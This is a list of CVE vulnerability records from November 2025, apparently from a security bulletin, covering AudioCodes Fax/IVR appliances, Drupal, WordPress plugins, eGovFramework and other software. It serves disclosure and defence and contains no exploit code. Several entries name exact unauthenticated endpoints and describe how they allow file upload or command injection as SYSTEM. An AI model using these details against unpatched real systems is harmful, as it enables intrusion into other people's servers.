| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component (F2MAdmin) that exposes an unauthenticated script-management endpoint at AudioCodes_files/utils/IVR/diagram/ajaxScript.php. The saveScript action writes attacker-supplied data directly to a server-side file path under the privileges of the web service account, which runs as NT AUTHORITY\\SYSTEM on Windows deployments. A remote, unauthenticated attacker can write arbitrary files into the product's web-accessible directory structure and subsequently execute them. | 2025-11-19 | not yet calculated | CVE-2025-34328 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-file-upload-rce-via-ajaxscript   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an unauthenticated backup upload endpoint at AudioCodes_files/ajaxBackupUploadFile.php in the F2MAdmin web interface. The script derives a backup folder path from application configuration, creates the directory if it does not exist, and then moves an uploaded file to that location using the attacker-controlled filename, without any authentication, authorization, or file-type validation. On default Windows deployments where the backup directory resolves to the system drive, a remote attacker can upload web server or interpreter configuration files that cause a log file or other server-controlled resource to be treated as executable code. This allows subsequent HTTP requests to trigger arbitrary command execution under the web server account, which runs as NT AUTHORITY\\SYSTEM. | 2025-11-19 | not yet calculated | CVE-2025-34329 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-backup-upload-rce-via-ajaxbackupuploadfile   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component (F2MAdmin) that exposes an unauthenticated prompt upload endpoint at AudioCodes_files/utils/IVR/diagram/ajaxPromptUploadFile.php. The script accepts an uploaded file and writes it into the C:\\F2MAdmin\\tmp directory using a filename derived from application constants, without any authentication, authorization, or file-type validation. A remote, unauthenticated attacker can upload or overwrite prompt- or music-on-hold-related files in this directory, potentially leading to tampering with IVR audio content or preparing files for use in further attacks. | 2025-11-19 | not yet calculated | CVE-2025-34330 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-prompt-file-upload-via-ajaxpromptuploadfile   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 contain an unauthenticated file read vulnerability via the download.php script. The endpoint exposes a file download mechanism that lacks access control, allowing remote, unauthenticated users to request files stored on the appliance based solely on attacker-supplied path and filename parameters. While limited to specific file extensions permitted by the application logic, sensitive backup archives can be retrieved, exposing internal databases and credential hashes. Successful exploitation may lead to disclosure of administrative password hashes and other sensitive configuration data. | 2025-11-19 | not yet calculated | CVE-2025-34331 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-file-read-via-download   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component that controls back-end Windows services using helper batch scripts located under C:\\F2MAdmin\\F2E\\AudioCodes_files\\utils\\Services. When certain service actions are requested through ajaxPost.php, these scripts are invoked by PHP using system() under the NT AUTHORITY\\SYSTEM account. The batch files in this directory are writable by any authenticated local user due to overly permissive ACLs, allowing them to replace script contents with arbitrary commands. On the next service start/stop operation, the modified script is executed as SYSTEM, enabling elevation of local privileges. | 2025-11-19 | not yet calculated | CVE-2025-34332 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-insecure-service-control-scripts-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 configure the web document root at C:\\F2MAdmin\\F2E with overly permissive file system permissions. Authenticated local users have modify rights on this directory, while the associated web server process runs as NT AUTHORITY\\SYSTEM. As a result, any local user can create or alter server-side scripts within the webroot and then trigger them via HTTP requests, causing arbitrary code to execute with SYSTEM privileges. | 2025-11-19 | not yet calculated | CVE-2025-34333 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-world-writable-webroot-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 are vulnerable to an authenticated command injection in the fax test functionality implemented by AudioCodes_files/TestFax.php. When a fax "send" test is requested, the application builds a faxsender command line using attacker-supplied parameters and passes it to GlobalUtils::RunBatchFile without proper validation or shell-argument sanitization. The resulting batch file is written into a temporary run directory and then executed via a backend service that runs as NT AUTHORITY\\SYSTEM. An authenticated attacker with access to the fax test interface can craft parameter values that inject additional shell commands into the generated batch file, leading to arbitrary command execution with SYSTEM privileges. In addition, because the generated batch files reside in a location with overly permissive file system permissions, a local low-privilege user on the server can modify pending batch files to achieve the same elevation. | 2025-11-19 | not yet calculated | CVE-2025-34334 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-authenticated-command-injection-via-testfax-and-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an authenticated command injection vulnerability in the license activation workflow handled by AudioCodes_files/ActivateLicense.php. When a license file is uploaded, the application derives a new filename by combining a generated base name with the attacker-controlled extension portion of the original upload name, then constructs a command line for fax_server_lic_cmdline.exe that includes this path. The extension value is incorporated into the command string without input validation, escaping, or proper argument quotation before being passed to exec(). An authenticated user with access to the license upload interface can supply a specially crafted filename whose extension injects additional shell metacharacters, causing arbitrary commands to be executed as NT AUTHORITY\\SYSTEM. | 2025-11-19 | not yet calculated | CVE-2025-34335 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-authenticated-command-injection-via-activatelicense   |
| authlib--joserfc | joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions from 1.3.3 to before 1.3.5 and from 1.4.0 to before 1.4.2, the ExceededSizeError exception messages are embedded with non-decoded JWT token parts and may cause Python logging to record an arbitrarily large, forged JWT payload. In situations where a misconfigured - or entirely absent - production-grade web server sits in front of a Python web application, an attacker may be able to send arbitrarily large bearer tokens in the HTTP request headers. When this occurs, Python logging or diagnostic tools (e.g., Sentry) may end up processing extremely large log messages containing the full JWT header during the joserfc.jwt.decode() operation. The same behavior also appears when validating claims and signature payload sizes, as the library raises joserfc.errors.ExceededSizeError() with the full payload embedded in the exception message. Since the payload is already fully loaded into memory at this stage, the library cannot prevent or reject it. This issue has been patched in versions 1.3.5 and 1.4.2. | 2025-11-18 | not yet calculated | CVE-2025-65015 | https://github.com/authlib/joserfc/security/advisories/GHSA-frfh-8v73-gjg4 https://github.com/authlib/joserfc/commit/63932f169d924caffafa761af2122b82059017f7 https://github.com/authlib/joserfc/commit/673c8743fd0605b0e1de6452be6cba75f44e466b https://github.com/authlib/joserfc/releases/tag/1.3.5 https://github.com/authlib/joserfc/releases/tag/1.4.2   |
| authzed--spicedb | SpiceDB is an open source database system for creating and managing security-critical application permissions. Prior to version 1.47.1, if a schema defines a permission as a union (+) whose two sides reference the same relation, with one side arrowing to a different permission, SpiceDB may return incomplete LookupResources results when checking that permission. Only LookupResources is affected; other APIs calculate permissionship correctly. The issue is fixed in version 1.47.1. | 2025-11-21 | not yet calculated | CVE-2025-65111 | https://github.com/authzed/spicedb/security/advisories/GHSA-9m7r-g8hg-x3vr https://github.com/authzed/spicedb/commit/8c2edbe1e7bd3851fa2138f4cc344bfde986dcf2 |
| Automated Logic--WebCtrl | Open Redirect in URL parameter in Automated Logic WebCTRL and Carrier i-Vu versions 6.0, 6.5, 7.0, 8.0, 8.5, 9.0 may allow attackers to exploit user sessions. | 2025-11-19 | not yet calculated | CVE-2024-8527 | https://www.corporate.carrier.com/product-security/advisories-resources/   |
| Automated Logic--WebCtrl | Reflected XSS using a specific URL in Automated Logic WebCTRL and Carrier i-VU can allow delivery of malicious payload due to a specific GET parameter not being sanitized. | 2025-11-19 | not yet calculated | CVE-2024-8528 | https://www.corporate.carrier.com/product-security/advisories-resources/   |
| BASIS International Ltd.--BASIS BBj | BASIS BBj versions prior to 25.00 contain a Jetty-served web endpoint that fails to properly validate or canonicalize input path segments. This allows unauthenticated directory traversal sequences to cause the server to read arbitrary system files accessible to the account running the service. Retrieved configuration artifacts may contain account credentials used for BBj Enterprise Manager; possession of these credentials enables administrative access and use of legitimate management functionality that can result in execution of system commands under the service account. Depending on the operating system and the privileges of the BBj service account, this issue may also allow access to other sensitive files on the host, including operating system or application data, potentially exposing additional confidential information. | 2025-11-20 | not yet calculated | CVE-2025-34320 | https://myemail.constantcontact.com/BASIS-International-Ltd--releases-BBj---the-Barista--Application-Framework--and-AddonSoftware--by-Barista-version-25-00.html?soid=1103463119019&aid=WbfWkReLRVE https://www.vulncheck.com/advisories/basis-bbj-unauthenticated-arbitrary-file-read-rce   |
| BEIMS--Contractor Web | A SQL Injection vulnerability on an endpoint in BEIMS Contractor Web, a legacy product that is no longer maintained or patched by the vendor, allows an unauthorised user to retrieve sensitive database contents via unsanitized parameter input. This vulnerability occurs due to improper input validation on the /BEIMSWeb/contractor.asp endpoint, and successful exploitation requires a contractor.asp endpoint open to the internet. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity and potentially the availability of the database. Version 5.7.139 has been confirmed as vulnerable. Other versions have not been confirmed by the vendor and users should assume that all versions of BEIMS Contractor Web may be impacted until further guidance is provided by the vendor. | 2025-11-17 | not yet calculated | CVE-2025-10460 | https://help.fmiworks.com/knowledge/beims-web https://help.fmiworks.com/knowledge/contractor-web-operational-requirements |
| boldthemes--Bold Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in boldthemes Bold Page Builder bold-page-builder allows DOM-Based XSS. This issue affects Bold Page Builder: from n/a through <= 5.5.2. | 2025-11-21 | not yet calculated | CVE-2025-66057 | https://vdp.patchstack.com/database/Wordpress/Plugin/bold-page-builder/vulnerability/wordpress-bold-page-builder-plugin-5-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bPlugins--Tiktok Feed | Missing Authorization vulnerability in bPlugins Tiktok Feed b-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tiktok Feed: from n/a through <= 1.0.22. | 2025-11-21 | not yet calculated | CVE-2025-66110 | https://vdp.patchstack.com/database/Wordpress/Plugin/b-tiktok-feed/vulnerability/wordpress-tiktok-feed-plugin-1-0-22-broken-access-control-vulnerability?_s_id=cve |
| bqworks--Accordion Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bqworks Accordion Slider accordion-slider allows Stored XSS. This issue affects Accordion Slider: from n/a through <= 1.9.13. | 2025-11-21 | not yet calculated | CVE-2025-66092 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordion-slider/vulnerability/wordpress-accordion-slider-plugin-1-9-13-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Camille V--Travelers' Map | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Camille V Travelers' Map travelers-map allows Stored XSS. This issue affects Travelers' Map: from n/a through <= 2.3.2. | 2025-11-21 | not yet calculated | CVE-2025-66098 | https://vdp.patchstack.com/database/Wordpress/Plugin/travelers-map/vulnerability/wordpress-travelers-map-plugin-2-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Checkmk GmbH--Checkmk | Insufficient permission validation on multiple REST API endpoints in Checkmk 2.2.0, 2.3.0, and 2.4.0 before version 2.4.0p16 allows low-privileged users to perform unauthorized actions or obtain sensitive information | 2025-11-18 | not yet calculated | CVE-2025-58121 | https://checkmk.com/werk/18983   |
| Checkmk GmbH--Checkmk | Insufficient permission validation in Checkmk 2.4.0 before version 2.4.0p16 allows low-privileged users to modify notification parameters via the REST API, which could lead to unauthorized actions or information disclosure. | 2025-11-18 | not yet calculated | CVE-2025-58122 | https://checkmk.com/werk/18982   |
| Checkmk GmbH--Checkmk | In Checkmk versions prior to 2.4.0p16, 2.3.0p41, and all versions of 2.2.0 and older, the mk_inotify plugin creates world-readable and writable files, allowing any local user on the system to read the plugin's output and manipulate it, potentially leading to unauthorized access to or modification of monitoring data. | 2025-11-18 | not yet calculated | CVE-2025-64996 | https://checkmk.com/werk/18570   |
| Cozmoslabs--WP Webhooks | Deserialization of Untrusted Data vulnerability in Cozmoslabs WP Webhooks wp-webhooks allows Object Injection. This issue affects WP Webhooks: from n/a through <= 3.3.8. | 2025-11-21 | not yet calculated | CVE-2025-66073 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-webhooks/vulnerability/wordpress-wp-webhooks-plugin-3-3-8-php-object-injection-vulnerability?_s_id=cve   |
| Cozy Vision--SMS Alert Order Notifications | Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SMS Alert Order Notifications: from n/a through <= 3.8.8. | 2025-11-21 | not yet calculated | CVE-2025-66086 | https://vdp.patchstack.com/database/Wordpress/Plugin/sms-alert/vulnerability/wordpress-sms-alert-order-notifications-plugin-3-8-8-broken-access-control-vulnerability?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Retrieve Embedded Sensitive Data. This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66059 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-sensitive-data-exposure-vulnerability?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66060 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-broken-access-control-vulnerability-2?_s_id=cve   |
| Craig Hewitt--Seriously Simple Podcasting | Cross-Site Request Forgery (CSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Cross Site Request Forgery. This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0. | 2025-11-21 | not yet calculated | CVE-2025-66061 | https://vdp.patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| dataease--dataease | Dataease is an open source data visualization analysis tool. Versions prior to 2.10.17 are vulnerable to JNDI injection. A blacklist was added in the patch for version 2.10.14. However, JNDI injection remains possible via the iiop, corbaname, and iiopname schemes. The vulnerability has been fixed in version 2.10.17. | 2025-11-20 | not yet calculated | CVE-2025-64428 | https://github.com/dataease/dataease/security/advisories/GHSA-88ph-3236-2m2h https://github.com/dataease/dataease/commit/b7e585c1cc3fc2b73cb289b8680b4b3914be3d53 https://github.com/dataease/dataease/releases/tag/v2.10.17   |
| Design--Stylish Cost Calculator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Design Stylish Cost Calculator stylish-cost-calculator allows DOM-Based XSS. This issue affects Stylish Cost Calculator: from n/a through <= 8.1.5. | 2025-11-21 | not yet calculated | CVE-2025-66091 | https://vdp.patchstack.com/database/Wordpress/Plugin/stylish-cost-calculator/vulnerability/wordpress-stylish-cost-calculator-plugin-8-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Drupal--Drupal core | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal Drupal core allows Forceful Browsing. This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13080 | https://www.drupal.org/sa-core-2025-005   |
| Drupal--Drupal core | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal core allows Object Injection. This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13081 | https://www.drupal.org/sa-core-2025-006   |
| Drupal--Drupal core | User Interface (UI) Misrepresentation of Critical Information vulnerability in Drupal Drupal core allows Content Spoofing. This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13082 | https://www.drupal.org/sa-core-2025-007   |
| Drupal--Drupal core | Use of Web Browser Cache Containing Sensitive Information vulnerability in Drupal Drupal core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Drupal core: from 8.0.0 before 10.4.9, from 10.5.0 before 10.5.6, from 11.0.0 before 11.1.9, from 11.2.0 before 11.2.8. | 2025-11-18 | not yet calculated | CVE-2025-13083 | https://www.drupal.org/sa-core-2025-008   |
| Drupal--Email TFA | Authentication Bypass Using an Alternate Path or Channel vulnerability in Drupal Email TFA allows Functionality Bypass. This issue affects Email TFA: from 0.0.0 before 2.0.6. | 2025-11-18 | not yet calculated | CVE-2025-12760 | https://www.drupal.org/sa-contrib-2025-115   |
| Drupal--Simple multi step form | Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Simple multi step form allows Cross-Site Scripting (XSS). This issue affects Simple multi step form: from 0.0.0 before 2.0.0. | 2025-11-18 | not yet calculated | CVE-2025-12761 | https://www.drupal.org/sa-contrib-2025-116   |
| Eclipse Foundation--Jersey | In Eclipse Jersey versions 2.45, 3.0.16 and 3.1.9, a race condition can cause critical SSL configuration, such as mutual authentication, custom key/trust stores and other security settings, to be ignored. Under normal circumstances this issue results in an SSLHandshakeException, but under certain conditions it could lead to unauthorized trust in insecure servers (see PoC). | 2025-11-18 | not yet calculated | CVE-2025-12383 | https://gitlab.eclipse.org/security/cve-assignment/-/issues/74   |
| eGovFramework/egovframe-common-components--eGovFramework/egovframe-common-components | eGovFramework/egovframe-common-components versions up to and including 4.3.1 contain an unauthenticated file upload vulnerability via the /utl/wed/insertImage.do and /utl/wed/insertImageCk.do image upload endpoints. These controllers accept multipart requests without authentication, pass the uploaded content to a shared upload helper, and store the file on the server under a framework-controlled path. The framework then returns a download URL that can be used to retrieve the uploaded content, including an attacker-controlled Content-Type within the limits of the image upload functionality. While a filename extension whitelist is enforced, the attacker fully controls the file contents. The response MIME type used is also attacker-controlled when the file is served up to version < 4.1.2. Since version 4.1.2, it is possible to download any image uploaded with any whitelisted content type. But any file uploaded other than an image will be served with the `application/octet-stream` content type (the content type is no longer controlled by the attacker since version 4.1.2). This enables an unauthenticated attacker to use any affected application as a persistent file hosting service for arbitrary content under the application's origin. KISA/KrCERT has identified this unpatched vulnerability as "KVE-2023-5280." | 2025-11-19 | not yet calculated | CVE-2025-34336 | https://www.egovframe.go.kr/eng/sub.do?menuNo=2 https://github.com/eGovFramework/egovframe-common-components https://pierrekim.github.io/blog/2025-11-20-egovframe-2-vulnerabilities.html https://pierrekim.github.io/advisories/2025-egovframe.txt https://www.vulncheck.com/advisories/egovframework-unauthenticated-file-upload-via-web-editor-image-upload-endpoints   |
| eGovFramework/egovframe-common-components--eGovFramework/egovframe-common-components | eGovFramework/egovframe-common-components versions up to and including 4.3.1 includes Web Editor image upload and related file delivery functionality that uses symmetric encryption to protect URL parameters, but exposes an encryption oracle that allows attackers to generate valid ciphertext for chosen values. The image upload endpoints /utl/wed/insertImage.do and /utl/wed/insertImageCk.do encrypt server-side paths, filenames, and MIME types and embed them directly into a download URL that is returned to the client. Because these same encrypted parameters are trusted by other endpoints, such as /utl/web/imageSrc.do and /cmm/fms/getImage.do, an unauthenticated attacker can abuse the upload functionality to obtain encrypted representations of attacker-chosen identifiers and then replay those ciphertext values to file-serving APIs. This design failure allows an attacker to bypass access controls that rely solely on the secrecy of encrypted parameters and retrieve arbitrary stored files that are otherwise expected to require an existing session or specific authorization context. KISA/KrCERT has identified this unpatched vulnerability as "KVE-2023-5281." | 2025-11-19 | not yet calculated | CVE-2025-34337 | https://www.egovframe.go.kr/eng/sub.do?menuNo=2 https://github.com/eGovFramework/egovframe-common-components https://pierrekim.github.io/blog/2025-11-20-egovframe-2-vulnerabilities.html https://pierrekim.github.io/advisories/2025-egovframe.txt https://www.vulncheck.com/advisories/egovframework-unauthenticated-encryption-oracle-via-web-editor-image-upload-endpoints   |
| EmbySupport--Emby.Security | Emby Server is a personal media server. Prior to version 4.8.1.0 and prior to Beta version 4.9.0.0-beta, a malicious user can send an authentication request with a manipulated X-Emby-Client value, which gets added to the devices section of the admin dashboard without sanitization. This issue has been patched in version 4.8.1.0 and Beta version 4.9.0.0-beta. | 2025-11-18 | not yet calculated | CVE-2025-64325 | https://github.com/EmbySupport/Emby.Security/security/advisories/GHSA-2gwc-988r-2r7x   |
| EnvoThemes--Envo Extra | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EnvoThemes Envo Extra envo-extra allows Stored XSS. This issue affects Envo Extra: from n/a through <= 1.9.11. | 2025-11-21 | not yet calculated | CVE-2025-66066 | https://vdp.patchstack.com/database/Wordpress/Plugin/envo-extra/vulnerability/wordpress-envo-extra-plugin-1-9-11-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. When the ESP32 is in advertising mode, if it receives a connection request containing an invalid Access Address (AA) of 0x00000000 or 0xFFFFFFFF, advertising may stop unexpectedly. In this case, the controller may incorrectly report a connection event to the host, which can cause the application layer to assume that the device has successfully established a connection. This issue has been fixed in versions 5.5.2, 5.4.3, 5.3.5, 5.2.6, and 5.1.7. At time of publication versions 5.5.2, 5.3.5, and 5.1.7 have not been released but are fixed respectively in commits 3b95b50, e3d7042, and 75967b5. | 2025-11-17 | not yet calculated | CVE-2025-64342 | https://github.com/espressif/esp-idf/security/advisories/GHSA-8mg7-9qpg-p92v https://github.com/espressif/esp-idf/commit/309f031dd6b04de30c926a256508c65b0df95dfa https://github.com/espressif/esp-idf/commit/3b95b50703cd3301a370cffaa1cc299b1941fe2a https://github.com/espressif/esp-idf/commit/75967b578563ea7876dc215251cbb6d64bc9d768 https://github.com/espressif/esp-idf/commit/8ec541023684d33b498fa21c5b4724bce748aa7b https://github.com/espressif/esp-idf/commit/bf66761962579f73aea682d1154b9c99b9d3d7dc https://github.com/espressif/esp-idf/commit/e3d70429566ece1ef593d36aa4ebd320e0c95925   |
| espressif--esp-idf | ESP-IDF is the Espressif Internet of Things (IoT) Development Framework. In versions 5.5.1, 5.4.3, and 5.3.4, when the ESP32-P4 uses its hardware JPEG decoder, the software parser lacks necessary validation checks. A specially crafted (malicious) JPEG image could exploit the parsing routine and trigger an out-of-bounds array access. This issue has been fixed in versions 5.5.2, 5.4.4, and 5.3.5. At time of publication versions 5.5.2, 5.4.4, and 5.3.5 have not been released but are fixed respectively in commits 4b8f585, c79cb4d, and 34e2726. | 2025-11-21 | not yet calculated | CVE-2025-65092 | https://github.com/espressif/esp-idf/security/advisories/GHSA-vcw6-jc3p-4gj8 https://github.com/espressif/esp-idf/commit/34e2726254201988e6e2752b2db4b70d73964d4c https://github.com/espressif/esp-idf/commit/4b8f5859dbe05d15372558f8a950b49f6ee44e42 https://github.com/espressif/esp-idf/commit/c38a6691b9845ac6ee0d0f6713783114770cdc17 https://github.com/espressif/esp-idf/commit/c79cb4de468854937a0cbf82629fd65d04bffb27   |
| Essential Plugin--Featured Post Creative | Missing Authorization vulnerability in Essential Plugin Featured Post Creative featured-post-creative allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Featured Post Creative: from n/a through <= 1.5.5. | 2025-11-21 | not yet calculated | CVE-2025-66106 | https://vdp.patchstack.com/database/Wordpress/Plugin/featured-post-creative/vulnerability/wordpress-featured-post-creative-plugin-1-5-5-broken-access-control-vulnerability?_s_id=cve   |
| Frank Goossens--WP YouTube Lyte | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Frank Goossens WP YouTube Lyte wp-youtube-lyte allows Phishing. This issue affects WP YouTube Lyte: from n/a through <= 1.7.28. | 2025-11-21 | not yet calculated | CVE-2025-66062 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-youtube-lyte/vulnerability/wordpress-wp-youtube-lyte-plugin-1-7-28-open-redirection-vulnerability?_s_id=cve   |
| FunnelKit--Funnel Builder by FunnelKit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FunnelKit Funnel Builder by FunnelKit funnel-builder allows DOM-Based XSS. This issue affects Funnel Builder by FunnelKit: from n/a through <= 3.13.1.2. | 2025-11-21 | not yet calculated | CVE-2025-66067 | https://vdp.patchstack.com/database/Wordpress/Plugin/funnel-builder/vulnerability/wordpress-funnel-builder-by-funnelkit-plugin-3-13-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| getkirby--kirby | Kirby is an open-source content management system. From versions 5.0.0 to 5.1.3, attackers could change the title of any page or the name of any user to a malicious string. Then they could modify any content field of the same model without saving, making the model a candidate for display in the "Changes" dialog. If another authenticated user subsequently opened the dialog in their Panel, the malicious code would be executed. This vulnerability affects all Kirby 5 sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to update page titles or usernames. The attack requires user interaction by another Panel user and cannot be automated. This issue has been patched in version 5.1.4. | 2025-11-18 | not yet calculated | CVE-2025-65012 | https://github.com/getkirby/kirby/security/advisories/GHSA-84hf-8gh5-575j https://github.com/getkirby/kirby/releases/tag/5.1.4   |
| golang.org/x/crypto--golang.org/x/crypto/ssh | SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption. | 2025-11-19 | not yet calculated | CVE-2025-58181 | https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA https://go.dev/cl/721961 https://go.dev/issue/76363 https://pkg.go.dev/vuln/GO-2025-4134   |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read. | 2025-11-19 | not yet calculated | CVE-2025-47914 | https://groups.google.com/g/golang-announce/c/w-oX3UxNcZA https://go.dev/cl/721960 https://go.dev/issue/76364 https://pkg.go.dev/vuln/GO-2025-4135   |
| Google Cloud--Looker | An attacker could take over a Looker account in a Looker instance configured with OIDC authentication, due to email address string normalization. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.100+ * 24.18.193+ * 25.0.69+ * 25.6.57+ * 25.8.39+ * 25.10.22+ * 25.12.0+ | 2025-11-20 | not yet calculated | CVE-2025-12414 | https://cloud.google.com/support/bulletins#GCP-2025-067   |
